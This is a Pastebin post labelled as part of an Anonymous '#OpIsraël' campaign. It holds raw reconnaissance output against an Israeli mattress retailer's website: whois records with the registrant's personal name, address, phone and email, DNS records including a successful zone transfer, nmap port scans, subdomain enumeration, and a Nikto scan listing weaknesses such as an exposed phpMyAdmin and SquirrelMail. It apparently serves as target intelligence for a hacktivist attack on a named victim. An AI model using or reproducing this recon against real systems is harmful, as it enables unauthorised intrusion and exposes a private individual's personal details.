API tools faq
paste
Advertisement
Guest User

Anonymous JTSEC #OpIsraël Full Recon #3

a guest
Jan 23rd, 2019
2,536
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 279.00 KB | None | 0 0
raw download clone embed print report
  1. #######################################################################################################################################
  2. Hostname babylon-woodline.co.il ISP 013 NetVision Ltd
  3. Continent Asia Flag
  4. IL
  5. Country Israel Country Code IL
  6. Region Unknown Local time 23 Jan 2019 11:15 IST
  7. City Unknown Postal Code Unknown
  8. IP Address 62.90.134.182 Latitude 31.5
  9. #######################################################################################################################################
  10. > babylon-woodline.co.il
  11. Server: 194.187.251.67
  12. Address: 194.187.251.67#53
  13.  
  14. Non-authoritative answer:
  15. Name: babylon-woodline.co.il
  16. Address: 62.90.134.182
  17. >
  18. #######################################################################################################################################
  19.  
  20. HostIP:62.90.134.182
  21. HostName:babylon-woodline.co.il
  22.  
  23. Gathered Inet-whois information for 62.90.134.182
  24. --------------------------------------------------------------------------------------------------------------------------------------
  25.  
  26.  
  27. inetnum: 62.90.0.0 - 62.90.255.255
  28. netname: IL-NETVISION-20000801
  29. country: IL
  30. org: ORG-NL5-RIPE
  31. admin-c: NVAD-RIPE
  32. tech-c: NVAD-RIPE
  33. status: ALLOCATED PA
  34. mnt-by: RIPE-NCC-HM-MNT
  35. mnt-by: NV-MNT-RIPE
  36. mnt-lower: NV-MNT-RIPE
  37. mnt-routes: NV-MNT-RIPE
  38. created: 2001-12-17T10:50:31Z
  39. last-modified: 2016-08-24T11:01:56Z
  40. source: RIPE # Filtered
  41.  
  42. organisation: ORG-NL5-RIPE
  43. org-name: 013 NetVision Ltd
  44. org-type: LIR
  45. address: 10 Hagavish st.
  46. address: 4250708
  47. address: Netanya
  48. address: ISRAEL
  49. phone: +972529989933
  50. fax-no: +97248550454
  51. abuse-c: AR15573-RIPE
  52. mnt-ref: RIPE-NCC-HM-MNT
  53. mnt-ref: NV-MNT-RIPE
  54. mnt-by: RIPE-NCC-HM-MNT
  55. mnt-by: NV-MNT-RIPE
  56. created: 2004-04-17T11:27:52Z
  57. last-modified: 2018-12-19T10:42:36Z
  58. source: RIPE # Filtered
  59.  
  60. person: Ripe Admin - 013 Netvision
  61. address: Matam, Haifa
  62. address: Israel
  63. phone: +972-4-8560454
  64. nic-hdl: NVAD-RIPE
  65. created: 2009-10-13T07:36:13Z
  66. last-modified: 2017-10-30T22:07:16Z
  67. source: RIPE # Filtered
  68. mnt-by: NV-MNT-RIPE
  69.  
  70. % Information related to '62.90.0.0/16AS1680'
  71.  
  72. route: 62.90.0.0/16
  73. descr: 013 Netvision Network
  74. origin: AS1680
  75. mnt-by: NV-MNT-RIPE
  76. created: 2009-03-26T10:21:42Z
  77. last-modified: 2009-03-26T10:21:42Z
  78. source: RIPE
  79.  
  80. % This query was served by the RIPE Database Query Service version 1.92.6 (ANGUS)
  81.  
  82.  
  83.  
  84. Gathered Inic-whois information for babylon-woodline.co.il
  85. ---------------------------------------------------------------------------------------------------------------------------------------
  86. domain: babylon-woodline.co.il
  87.  
  88. descr: daniel ovadia
  89. descr: mezada 3
  90. descr: hodhasron
  91. descr: 4529414
  92. descr: Israel
  93. phone: +972 2 2601060
  94. e-mail: web4id AT gmail.com
  95. admin-c: GI-DO2301-IL
  96. tech-c: GI-DO2301-IL
  97. zone-c: GI-DO2301-IL
  98. nserver: ns1.webid.co.il
  99. nserver: ns2.webid.co.il
  100. validity: 19-08-2019
  101. DNSSEC: unsigned
  102. status: Transfer Locked
  103. changed: domain-registrar AT isoc.org.il 20180819 (Assigned)
  104.  
  105. person: daniel ovadia
  106. address mezada 3
  107. address hod hasron
  108. address 4529414
  109. address Israel
  110. phone: +972 2 2601060
  111. e-mail: web4id AT gmail.com
  112. nic-hdl: GI-DO2301-IL
  113. changed: domain-registrar AT isoc.org.il 20180819
  114.  
  115. registrar name: Gorni Interactive Ltd
  116. registrar info: http://www.box.co.il/
  117.  
  118. % Rights to the data above are restricted by copyright.
  119.  
  120. Gathered Netcraft information for babylon-woodline.co.il
  121. ---------------------------------------------------------------------------------------------------------------------------------------
  122.  
  123. Retrieving Netcraft.com information for babylon-woodline.co.il
  124. Netcraft.com Information gathered
  125.  
  126. Gathered Subdomain information for babylon-woodline.co.il
  127. ---------------------------------------------------------------------------------------------------------------------------------------
  128. Searching Google.com:80...
  129. Searching Altavista.com:80...
  130. Found 0 possible subdomain(s) for host babylon-woodline.co.il, Searched 0 pages containing 0 results
  131.  
  132. Gathered E-Mail information for babylon-woodline.co.il
  133. --------------------------------------------------------------------------------------------------------------------------------------
  134. Searching Google.com:80...
  135. Searching Altavista.com:80...
  136. Found 0 E-Mail(s) for host babylon-woodline.co.il, Searched 0 pages containing 0 results
  137.  
  138. Gathered TCP Port information for 62.90.134.182
  139. ---------------------------------------------------------------------------------------------------------------------------------------
  140.  
  141. Port State
  142.  
  143. 21/tcp open
  144. 53/tcp open
  145. 80/tcp open
  146. 110/tcp open
  147. 143/tcp open
  148.  
  149. Portscan Finished: Scanned 150 ports, 143 ports were in state closed
  150. #######################################################################################################################################
  151. [i] Scanning Site: http://babylon-woodline.co.il
  152.  
  153.  
  154.  
  155. B A S I C I N F O
  156. =======================================================================================================================================
  157.  
  158.  
  159. [+] Site Title: מזרונים ליין
  160. [+] IP address: 62.90.134.182
  161. [+] Web Server: Could Not Detect
  162. [+] CMS: Could Not Detect
  163. [+] Cloudflare: Not Detected
  164. [+] Robots File: Found
  165.  
  166. -------------[ contents ]----------------
  167. User-agent: *
  168. Allow: /
  169. -----------[end of contents]-------------
  170.  
  171.  
  172.  
  173. W H O I S L O O K U P
  174. =======================================================================================================================================
  175.  
  176.  
  177. % The data in the WHOIS database of the .il registry is provided
  178. % by ISOC-IL for information purposes, and to assist persons in
  179. % obtaining information about or related to a domain name
  180. % registration record. ISOC-IL does not guarantee its accuracy.
  181. % By submitting a WHOIS query, you agree that you will use this
  182. % Data only for lawful purposes and that, under no circumstances
  183. % will you use this Data to: (1) allow, enable, or otherwise
  184. % support the transmission of mass unsolicited, commercial
  185. % advertising or solicitations via e-mail (spam);
  186. % or (2) enable high volume, automated, electronic processes that
  187. % apply to ISOC-IL (or its systems).
  188. % ISOC-IL reserves the right to modify these terms at any time.
  189. % By submitting this query, you agree to abide by this policy.
  190.  
  191. query: babylon-woodline.co.il
  192.  
  193. reg-name: babylon-woodline
  194. domain: babylon-woodline.co.il
  195.  
  196. descr: daniel ovadia
  197. descr: mezada 3
  198. descr: hodhasron
  199. descr: 4529414
  200. descr: Israel
  201. phone: +972 2 2601060
  202. e-mail: web4id AT gmail.com
  203. admin-c: GI-DO2301-IL
  204. tech-c: GI-DO2301-IL
  205. zone-c: GI-DO2301-IL
  206. nserver: ns1.webid.co.il
  207. nserver: ns2.webid.co.il
  208. validity: 19-08-2019
  209. DNSSEC: unsigned
  210. status: Transfer Locked
  211. changed: domain-registrar AT isoc.org.il 20180819 (Assigned)
  212.  
  213. person: daniel ovadia
  214. address mezada 3
  215. address hod hasron
  216. address 4529414
  217. address Israel
  218. phone: +972 2 2601060
  219. e-mail: web4id AT gmail.com
  220. nic-hdl: GI-DO2301-IL
  221. changed: domain-registrar AT isoc.org.il 20180819
  222.  
  223. registrar name: Gorni Interactive Ltd
  224. registrar info: http://www.box.co.il/
  225.  
  226. % Rights to the data above are restricted by copyright.
  227.  
  228.  
  229.  
  230.  
  231. G E O I P L O O K U P
  232. =======================================================================================================================================
  233.  
  234. [i] IP Address: 62.90.134.182
  235. [i] Country: Israel
  236. [i] State:
  237. [i] City:
  238. [i] Latitude: 31.5
  239. [i] Longitude: 34.75
  240.  
  241.  
  242.  
  243.  
  244. H T T P H E A D E R S
  245. =======================================================================================================================================
  246.  
  247.  
  248. [i] HTTP/1.1 301 Moved Permanently
  249. [i] Date: Wed, 23 Jan 2019 09:21:56 GMT
  250. [i] Content-Type: text/html; charset=utf-8
  251. [i] Content-Length: 0
  252. [i] Location: /index.1.html
  253. [i] Vary: User-Agent
  254. [i] Connection: close
  255. [i] HTTP/1.1 200 OK
  256. [i] Date: Wed, 23 Jan 2019 09:21:57 GMT
  257. [i] Content-Type: text/html; charset=utf-8
  258. [i] Vary: Accept-Encoding,User-Agent
  259. [i] Connection: close
  260.  
  261.  
  262.  
  263.  
  264. D N S L O O K U P
  265. =======================================================================================================================================
  266.  
  267. babylon-woodline.co.il. 14399 IN TXT "v=spf1 a mx ip4:62.90.134.182 ~all"
  268. babylon-woodline.co.il. 14399 IN MX 10 mail.babylon-woodline.co.il.
  269. babylon-woodline.co.il. 14399 IN SOA ns1.webid.co.il. hostmaster.babylon-woodline.co.il. 2018081901 14400 3600 1209600 86400
  270. babylon-woodline.co.il. 14399 IN NS ns2.webid.co.il.
  271. babylon-woodline.co.il. 14399 IN NS ns1.webid.co.il.
  272. babylon-woodline.co.il. 14399 IN A 62.90.134.182
  273.  
  274.  
  275.  
  276.  
  277. S U B N E T C A L C U L A T I O N
  278. =======================================================================================================================================
  279.  
  280. Address = 62.90.134.182
  281. Network = 62.90.134.182 / 32
  282. Netmask = 255.255.255.255
  283. Broadcast = not needed on Point-to-Point links
  284. Wildcard Mask = 0.0.0.0
  285. Hosts Bits = 0
  286. Max. Hosts = 1 (2^0 - 0)
  287. Host Range = { 62.90.134.182 - 62.90.134.182 }
  288.  
  289.  
  290.  
  291. N M A P P O R T S C A N
  292. =======================================================================================================================================
  293.  
  294.  
  295. Starting Nmap 7.40 ( https://nmap.org ) at 2019-01-23 09:21 UTC
  296. Nmap scan report for babylon-woodline.co.il (62.90.134.182)
  297. Host is up (0.13s latency).
  298. rDNS record for 62.90.134.182: server.webid.co.il
  299. PORT STATE SERVICE
  300. 21/tcp open ftp
  301. 22/tcp filtered ssh
  302. 23/tcp closed telnet
  303. 80/tcp open http
  304. 110/tcp open pop3
  305. 143/tcp open imap
  306. 443/tcp open https
  307. 3389/tcp closed ms-wbt-server
  308.  
  309. Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds
  310.  
  311.  
  312.  
  313. S U B - D O M A I N F I N D E R
  314. ========================================================================================================================================
  315.  
  316.  
  317. [i] Total Subdomains Found : 1
  318.  
  319. [+] Subdomain: www.babylon-woodline.co.il
  320. [-] IP: 62.90.134.182
  321. #######################################################################################################################################
  322. [?] Enter the target: example( http://domain.com )
  323. http://babylon-woodline.co.il/index.1.html
  324. [!] IP Address : 62.90.134.182
  325. [!] babylon-woodline.co.il doesn't seem to use a CMS
  326. [+] Honeypot Probabilty: 30%
  327. ---------------------------------------------------------------------------------------------------------------------------------------
  328. [~] Trying to gather whois information for babylon-woodline.co.il
  329. [+] Whois information found
  330. [-] Unable to build response, visit https://who.is/whois/babylon-woodline.co.il
  331. ---------------------------------------------------------------------------------------------------------------------------------------
  332. PORT STATE SERVICE
  333. 21/tcp open ftp
  334. 22/tcp filtered ssh
  335. 23/tcp closed telnet
  336. 80/tcp open http
  337. 110/tcp open pop3
  338. 143/tcp open imap
  339. 443/tcp open https
  340. 3389/tcp closed ms-wbt-server
  341. Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds
  342. ---------------------------------------------------------------------------------------------------------------------------------------
  343.  
  344. [+] DNS Records
  345. ns1.webid.co.il. (62.90.134.182) AS1680 013 NetVision Ltd Israel
  346. ns2.webid.co.il. (212.150.246.99) AS1680 013 NetVision Ltd Israel
  347.  
  348. [+] MX Records
  349. 10 (62.90.134.182) AS1680 013 NetVision Ltd Israel
  350.  
  351. [+] Host Records (A)
  352. mail.babylon-woodline.co.ilHTTP: (server.webid.co.il) (62.90.134.182) AS1680 013 NetVision Ltd Israel
  353. www.babylon-woodline.co.ilHTTP: (server.webid.co.il) (62.90.134.182) AS1680 013 NetVision Ltd Israel
  354.  
  355. [+] TXT Records
  356. "v=spf1 a mx ip4:62.90.134.182 ~all"
  357.  
  358. [+] DNS Map: https://dnsdumpster.com/static/map/babylon-woodline.co.il.png
  359.  
  360. [>] Initiating 3 intel modules
  361. [>] Loading Alpha module (1/3)
  362. [>] Beta module deployed (2/3)
  363. [>] Gamma module initiated (3/3)
  364. No emails found
  365.  
  366. [+] Hosts found in search engines:
  367. ---------------------------------------------------------------------------------------------------------------------------------------
  368. [-] Resolving hostnames IPs...
  369. 62.90.134.182:www.babylon-woodline.co.il
  370. [+] Virtual hosts:
  371. --------------------------------------------------------------------------------------------------------------------------------------
  372. #######################################################################################################################################
  373. <<>> DiG 9.11.5-P1-1-Debian <<>> babylon-woodline.co.il
  374. ;; global options: +cmd
  375. ;; Got answer:
  376. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9587
  377. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  378.  
  379. ;; OPT PSEUDOSECTION:
  380. ; EDNS: version: 0, flags:; udp: 4096
  381. ;; QUESTION SECTION:
  382. ;babylon-woodline.co.il. IN A
  383.  
  384. ;; ANSWER SECTION:
  385. babylon-woodline.co.il. 13270 IN A 62.90.134.182
  386.  
  387. ;; Query time: 195 msec
  388. ;; SERVER: 194.187.251.67#53(194.187.251.67)
  389. ;; WHEN: mer jan 23 04:33:35 EST 2019
  390. ;; MSG SIZE rcvd: 67
  391. #######################################################################################################################################
  392. ; <<>> DiG 9.11.5-P1-1-Debian <<>> +trace babylon-woodline.co.il
  393. ;; global options: +cmd
  394. . 79459 IN NS d.root-servers.net.
  395. . 79459 IN NS i.root-servers.net.
  396. . 79459 IN NS h.root-servers.net.
  397. . 79459 IN NS e.root-servers.net.
  398. . 79459 IN NS l.root-servers.net.
  399. . 79459 IN NS b.root-servers.net.
  400. . 79459 IN NS g.root-servers.net.
  401. . 79459 IN NS f.root-servers.net.
  402. . 79459 IN NS j.root-servers.net.
  403. . 79459 IN NS m.root-servers.net.
  404. . 79459 IN NS k.root-servers.net.
  405. . 79459 IN NS a.root-servers.net.
  406. . 79459 IN NS c.root-servers.net.
  407. . 79459 IN RRSIG NS 8 0 518400 20190205050000 20190123040000 16749 . BjuPr9Wtn9W9+vjQuS+mCRtw0GlXadQUTZqWzyZaC3F69/qrZtLxkRDe u4CfiNpk+6Fr3WMHjEKjYCsXzZCnSjzS76IJSxNr5PPAIwkZ7qhoGcTi jQTCL0BBrNJa7FD29nPJ/pr3ljArReL3k4Gi/h/d1AJdOYNz5eXFzcRI l4YrdXsG6gMY3JmksoE/EDh9vp+BYwga3ZMv72ptER/BYcr2KqCKYK3V QMlr+kvO+s32m93OAOaqrtfBQZAAt0lqwGtU+tv0H0arV1LzcR6VZ3Yw XlHG1B6MybqD4BsXJOhyAEBq5e9TkjQcsz475DWKobsGTbFzK4MnKVC6 pPkqjg==
  408. ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 193 ms
  409.  
  410. il. 172800 IN NS lookup.iucc.ac.il.
  411. il. 172800 IN NS ns2.ns.il.
  412. il. 172800 IN NS ns3.ns.il.
  413. il. 172800 IN NS nsa.ns.il.
  414. il. 172800 IN NS nsb.ns.il.
  415. il. 172800 IN NS nse.ns.il.
  416. il. 172800 IN NS ilns.ilan.net.il.
  417. il. 172800 IN NS ns1.ns.il.
  418. il. 172800 IN NS sns-pb.isc.org.
  419. il. 86400 IN DS 44729 8 2 7FA5A2FD091C340D4A01864B4F82D66D0769F3D3A0A1C48F8ABD2A64 B1689921
  420. il. 86400 IN RRSIG DS 8 1 86400 20190205050000 20190123040000 16749 . SQOU99Bum6R/ILTSFLCF9NuR8m8hX0LaLDWcYPRhbjJ91HXADNIuLyAu E/6tzXAjXOLtEkHUFglopUAZ4bSl7CKaRilthsWiXwOipsRtfBqzjUWx THK1gJtOi+CIaZ5dOLvw5mrK/ks5V9vHL64nctmtl4aiPHEMS2SvmslH O0ekd1U5Urcvb0Q14R9OloM5+q86XLXEM51NESFLG040/HSbviWnj68i MT3jaC3J+GUmV9s218eYrAc7VfhPeU4xr7s4g+gmtxDc7zxlIBd4TFRg 6UsATmDjSMCrWnryhQIth+9V5j2LMw6MUpo0PskaEpACIZsC+bfzMelI 0LruNg==
  421. ;; Received 866 bytes from 2001:500:a8::e#53(e.root-servers.net) in 27 ms
  422.  
  423. babylon-woodline.co.il. 86400 IN NS ns1.webid.co.il.
  424. babylon-woodline.co.il. 86400 IN NS ns2.webid.co.il.
  425. i4ng30e6ho1oogjus9gnuf4ho8qjr729.co.il. 86400 IN NSEC3 1 1 10 7CE12AF346933CF2 I808NA34LO7Q55K3FAOBFSHSVU39TF9J NS SOA RRSIG DNSKEY NSEC3PARAM
  426. i4ng30e6ho1oogjus9gnuf4ho8qjr729.co.il. 86400 IN RRSIG NSEC3 8 3 86400 20190223080907 20190123070907 7233 co.il. Ygz6zcCwHg8HGE8yIWZcrQ/krSkly54AKHIpxi8COxDQCVo6IuhHw7VU nZhYZ9NJebX4BrnBmYUKTUBnnXDYsXM9CZafaO+5r5QrKLJGd7rSUrSh Gh1FFVjIqBiQhSS8lT/nrVdxMI85R/5wxe288XIf9QhEZDojT9+d8FQf OMG1Qy/khCWia02SNC4/Sgr5t4PqriIb9ItOD858JaCZBZ9pkR/XU1NM mwU/6jw+sabF17i35QuWHct0ZKW9ERrFfRO9s8NeniuNYrKcuTlH6EUl Hk6X1+GWEzkU3vZu5LgayNLMuUTSH6b9dlQJlaWVZvNO933vC0ipic5h x4pmHA==
  427. 9bpjm4r164qdueicm4kbr4kanmot6n7s.co.il. 86400 IN NSEC3 1 1 10 7CE12AF346933CF2 C2FULIBVA4GGAM91K16PHT5CA62MJPF3 NS DS RRSIG
  428. 9bpjm4r164qdueicm4kbr4kanmot6n7s.co.il. 86400 IN RRSIG NSEC3 8 3 86400 20190223080907 20190123070907 7233 co.il. aR3RlfUG9KMhJ2R9LDiouTDywVUd/8gfXuVSgJxPZqe9hxfzuIAA78n7 sfj/KdaA5JA4as9IjtDc/89lr8aHsm4tWz+HkGnm104Q8ewbg9W/a8ib 0A1ZRCQrfkeDYVvfAAwcbjO4XTggXyzpU426hsePRmUz6y9gb07jswkp mALq3pMV05mb+YqJEgmG7koxXRX80H30/9UdMF+C8nrTVyPqCrEA7ErW eBpEnvnLyz4hmjSlt4DijBNp4TOolc+7cMOtOcxymJFO48aZSbVBRBR9 p5vYQy6paIqJE7hDQ19KVllQe3XNox/PmOi7Lhc9ohuT7gGorRT1gfhG Fiwj2A==
  429. ;; Received 914 bytes from 2001:678:e:103::53#53(ns3.ns.il) in 76 ms
  430.  
  431. babylon-woodline.co.il. 14400 IN A 62.90.134.182
  432. babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
  433. babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
  434. ;; Received 141 bytes from 212.150.246.99#53(ns2.webid.co.il) in 231 ms
  435. ######################################################################################################################################
  436. [*] Performing General Enumeration of Domain: babylon-woodline.co.il
  437. [-] DNSSEC is not configured for babylon-woodline.co.il
  438. [*] SOA ns1.webid.co.il 62.90.134.182
  439. [*] NS ns2.webid.co.il 212.150.246.99
  440. [*] Bind Version for 212.150.246.99 9.9.4-RedHat-9.9.4-61.el7
  441. [*] NS ns1.webid.co.il 62.90.134.182
  442. [*] Bind Version for 62.90.134.182 9.9.4-RedHat-9.9.4-61.el7
  443. [*] MX mail.babylon-woodline.co.il 62.90.134.182
  444. [*] A babylon-woodline.co.il 62.90.134.182
  445. [*] TXT babylon-woodline.co.il v=spf1 a mx ip4:62.90.134.182 ~all
  446. [*] TXT _domainkey.babylon-woodline.co.il o=~
  447. [*] Enumerating SRV Records
  448. [-] No SRV Records Found for babylon-woodline.co.il
  449. [+] 0 Records Found
  450. #######################################################################################################################################
  451. Traceroute 'babylon-woodline.co.il'
  452. ---------------------------------------------------------------------------------------------------------------------------------------
  453.  
  454. Start: 2019-01-23T09:36:47+0000
  455. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
  456. 1.|-- 45.79.12.202 0.0% 3 0.8 0.8 0.7 0.9 0.1
  457. 2.|-- 45.79.12.6 0.0% 3 0.4 1.2 0.4 2.2 0.9
  458. 3.|-- dls-b22-link.telia.net 0.0% 3 2.9 1.9 0.8 2.9 1.0
  459. 4.|-- atl-b22-link.telia.net 0.0% 3 18.6 18.6 18.6 18.6 0.0
  460. 5.|-- ash-bb4-link.telia.net 0.0% 3 45.4 48.0 45.4 50.8 2.7
  461. 6.|-- prs-bb3-link.telia.net 0.0% 3 140.8 140.7 140.4 140.8 0.2
  462. 7.|-- ldn-bb3-link.telia.net 0.0% 3 126.4 126.9 125.7 128.7 1.6
  463. 8.|-- ldn-b4-link.telia.net 0.0% 3 126.4 128.1 126.4 130.4 2.1
  464. 9.|-- ldn-bb4-link.telia.net 33.3% 3 129.4 127.6 125.8 129.4 2.5
  465. 10.|-- ldn-b4-link.telia.net 0.0% 3 125.7 126.1 125.7 127.0 0.7
  466. 11.|-- netvision-ic-304535.c.telia.net 0.0% 3 124.5 125.1 124.5 125.8 0.6
  467. 12.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  468. 13.|-- gw2-2-0-5-hfa-gw2-lnd.nv.net.il 0.0% 3 194.8 195.3 194.8 196.1 0.7
  469. 14.|-- core1-0-1-0-2-gw2.hfa.nv.net.il 0.0% 3 193.1 192.3 191.8 193.1 0.7
  470. 15.|-- core1-rha2-0-0-core1-hfa.nv.net.il 0.0% 3 191.0 190.8 190.4 191.0 0.4
  471. 16.|-- po221.srvc3.rha.nv.net.il 0.0% 3 192.5 193.6 192.5 194.6 1.0
  472. 17.|-- 82-166-37-254.barak-online.net 0.0% 3 199.7 199.1 196.8 200.7 2.0
  473. 18.|-- 62-90-134-178.barak.net.il 0.0% 3 196.6 196.9 196.6 197.2 0.3
  474. 19.|-- server.webid.co.il 0.0% 3 218.0 215.0 213.3 218.0 2.6
  475. #######################################################################################################################################
  476. [*] Processing domain babylon-woodline.co.il
  477. [*] Using system resolvers ['194.187.251.67', '185.93.180.131', '83.143.245.42', '205.151.67.6', '205.151.67.34', '205.151.67.2', '2001:18c0:ffe0:2::2', '2001:18c0:ffe0:3::2', '2001:18c0:ffe0:1::2']
  478. [+] Getting nameservers
  479. 212.150.246.99 - ns2.webid.co.il
  480. [+] Zone transfer sucessful using nameserver ns2.webid.co.il
  481. babylon-woodline.co.il. 14400 IN SOA ns1.webid.co.il. hostmaster.babylon-woodline.co.il. 2018081901 14400 3600 1209600 86400
  482. babylon-woodline.co.il. 14400 IN TXT "v=spf1 a mx ip4:62.90.134.182 ~all"
  483. babylon-woodline.co.il. 14400 IN MX 10 mail.babylon-woodline.co.il.
  484. babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
  485. babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
  486. babylon-woodline.co.il. 14400 IN A 62.90.134.182
  487. _domainkey.babylon-woodline.co.il. 14400 IN TXT "o=~"
  488. x._domainkey.babylon-woodline.co.il. 14400 IN TXT "v=DKIM1; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnPngW+NT8sgdpBM2YWoyLd7AkZ0vpm6fgtyACNiOhtVCvGy+KE1IoShdqPcCDt3G6L5pa6gJo9kfxkX4bO1niE8" "dGIirGFgqy4dixwIZ1FYBEOLzND9S+Izh5G6NOkq22FcrTwPIfTTDnZTsR7UhuQMtXa4EflM43kXjBaM/l1tIXW3kuCOnW3kzm8d00KJZYdM4CWFOSiQyvg1wrjaI+VYuMY1Io4V3ytpscEjb1kJo1" "JKDWhek+ZIuGim5sDv18a16Ho7/OnGUctWL00MDQ3cqm4w0bqI1fnjAI+v2R/OpHmZPXL1ddJRlSSLspnqgionlZ+FBO5DLPBkhrttJ8QIDAQAB"
  489. ftp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  490. mail.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  491. pop.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  492. smtp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  493. www.babylon-woodline.co.il. 14400 IN A 62.90.134.182
  494. #######################################################################################################################################
  495. Port État Service
  496. 21/tcp open ftp
  497. 53/tcp open domain
  498. 80/tcp open http
  499. 110/tcp open pop3
  500. 143/tcp open imap
  501. 443/tcp open https
  502. 465/tcp open smtps
  503. 587/tcp open submission
  504. 993/tcp open imaps
  505. 995/tcp open pop3s
  506. 2000/tcp open cisco-sccp
  507. 2222/tcp open EtherNetIP-1
  508. 3306/tcp open mysql
  509. 5060/tcp open sip
  510. 8080/tcp open http-proxy
  511. 8081/tcp open blackice-icecap
  512. #######################################################################################################################################
  513. Source TTL Type d'adresse Type d'enregistrement Résolution
  514. babylon-woodline.co.il. 14400 IN SOA ns1.webid.co.il. hostmaster.babylon-woodline.co.il. 2018081901 14400 3600 1209600 86400
  515. babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
  516. babylon-woodline.co.il. 14400 IN A 62.90.134.182
  517. babylon-woodline.co.il. 14400 IN TXT "v=spf1 a mx ip4:62.90.134.182 ~all"
  518. babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
  519. babylon-woodline.co.il. 14400 IN MX mail.babylon-woodline.co.il. (10)
  520. #######################################################################################################################################
  521. "www.babylon-woodline.co.il",
  522. "ftp.babylon-woodline.co.il",
  523. "pop.babylon-woodline.co.il",
  524. "smtp.babylon-woodline.co.il",
  525. "x._domainkey.babylon-woodline.co.il",
  526. "mail.babylon-woodline.co.il",
  527. "_domainkey.babylon-woodline.co.il"
  528. ]
  529. + resolving target: YES
  530. - scaning for subdomain...
  531.  
  532. Ip Address Status Type Domain Name Server
  533. ---------- ------ ---- ----------- ------
  534. 62.90.134.182 200 host ftp.babylon-woodline.co.il nginx
  535. 62.90.134.182 200 host mail.babylon-woodline.co.il nginx
  536. 62.90.134.182 200 host pop.babylon-woodline.co.il nginx
  537. 62.90.134.182 200 host smtp.babylon-woodline.co.il nginx
  538. 62.90.134.182 301 host www.babylon-woodline.co.il nginx
  539. #######################################################################################################################################
  540. [+] Testing domain
  541. www.babylon-woodline.co.il 62.90.134.182
  542. [+] Dns resolving
  543. Domain name Ip address Name server
  544. babylon-woodline.co.il 62.90.134.182 server.webid.co.il
  545. Found 1 host(s) for babylon-woodline.co.il
  546. [+] Testing wildcard
  547. Ok, no wildcard found.
  548.  
  549. [+] Scanning for subdomain on babylon-woodline.co.il
  550. [!] Wordlist not specified. I scannig with my internal wordlist...
  551. Estimated time about 127.8 seconds
  552.  
  553. Subdomain Ip address Name server
  554.  
  555. ftp.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
  556. mail.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
  557. pop.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
  558. smtp.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
  559. www.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
  560. #######################################################################################################################################
  561. =======================================================================================================================================
  562. | E-mails:
  563. | [+] E-mail Found: mike@hyperreal.org
  564. | [+] E-mail Found: webmaster@babylon-woodline.co.il
  565. | [+] E-mail Found: humbedooh@apache.org
  566. | [+] E-mail Found: kevinh@kevcom.com
  567. =======================================================================================================================================
  568. | External hosts:
  569. | [+] External Host Found: http://httpd.apache.org
  570. | [+] External Host Found: http://html5shiv.googlecode.com
  571. =======================================================================================================================================
  572. #######################################################################################################################################
  573. --------------------------------------------------------------------------------------------------------------------------------------
  574. + Target IP: 62.90.134.182
  575. + Target Hostname: 62.90.134.182
  576. + Target Port: 443
  577. --------------------------------------------------------------------------------------------------------------------------------------
  578. + SSL Info: Subject: /C=US/ST=Someprovince/L=Sometown/O=none/OU=none/CN=localhost/emailAddress=webmaster@localhost
  579. Ciphers: ECDHE-RSA-AES128-GCM-SHA256
  580. Issuer: /C=US/ST=Someprovince/L=Sometown/O=none/OU=none/CN=localhost/emailAddress=webmaster@localhost
  581. + Start Time: 2019-01-23 04:21:17 (GMT-5)
  582. ---------------------------------------------------------------------------------------------------------------------------------------
  583. + Server: nginx
  584. + Server leaks inodes via ETags, header found with file /, fields: 0x2b 0x56ee9136e8a00
  585. + The anti-clickjacking X-Frame-Options header is not present.
  586. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  587. + Uncommon header 'x-accel-version' found, with contents: 0.01
  588. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  589. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  590. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
  591. + Hostname '62.90.134.182' does not match certificate's names: localhost
  592. + Uncommon header 'x-ob_mode' found, with contents: 1
  593. + Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow
  594. + Uncommon header 'referrer-policy' found, with contents: no-referrer
  595. + Uncommon header 'x-permitted-cross-domain-policies' found, with contents: none
  596. + OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
  597. + Cookie SQMSESSID created without the secure flag
  598. + Cookie SQMSESSID created without the httponly flag
  599. + OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
  600. + OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
  601. + OSVDB-3268: /icons/: Directory indexing found.
  602. + OSVDB-3233: /icons/README: Apache default file found.
  603. ---------------------------------------------------------------------------------------------------------------------------------------
  604. ######################################################################################################################################
  605. --------------------------------------------------------------------------------------------------------------------------------------
  606. + Target IP: 62.90.134.182
  607. + Target Hostname: babylon-woodline.co.il
  608. + Target Port: 80
  609. + Start Time: 2019-01-23 04:21:22 (GMT-5)
  610. ---------------------------------------------------------------------------------------------------------------------------------------
  611. + Server: No banner retrieved
